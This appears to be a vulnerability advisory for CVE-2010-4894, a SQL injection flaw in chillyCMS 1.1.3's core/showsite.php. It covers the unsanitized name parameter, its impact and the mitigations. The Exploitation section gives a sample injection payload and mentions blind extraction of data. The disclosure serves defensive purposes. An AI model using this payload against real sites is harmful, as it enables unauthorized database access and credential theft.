CVE-2010-4894

Vulnerability

The chillyCMS version 1.1.3 contains a SQL injection vulnerability in the core/showsite.php script. The name parameter is not properly sanitized before being used in a SQL query, allowing an attacker to inject arbitrary SQL commands. This vulnerability is present in the latest version at the time of disclosure [1][2].

Exploitation

An attacker can exploit this vulnerability remotely without authentication by sending a crafted HTTP request to core/showsite.php with a malicious name parameter. The injection vector involves using a single quote and parentheses to break out of the query context. For example, the payload ') or 1=(' can be used to manipulate the query. Blind SQL injection techniques can be employed to extract data character by character [2].

Impact

Successful exploitation allows an attacker to execute arbitrary SQL commands against the underlying database. This can lead to unauthorized access to sensitive data, such as user credentials, and potentially full compromise of the application. The attacker gains the ability to read, modify, or delete database contents [2].

Mitigation

As of the publication of the vulnerability, no official fix was available from the vendor. The vendor's website (frozenpepper.de) may have released an update after the disclosure. Users are advised to upgrade to a patched version if available, or apply input validation and parameterized queries as a workaround. The vulnerability is not listed on the CISA Known Exploited Vulnerabilities (KEV) catalog [1][2].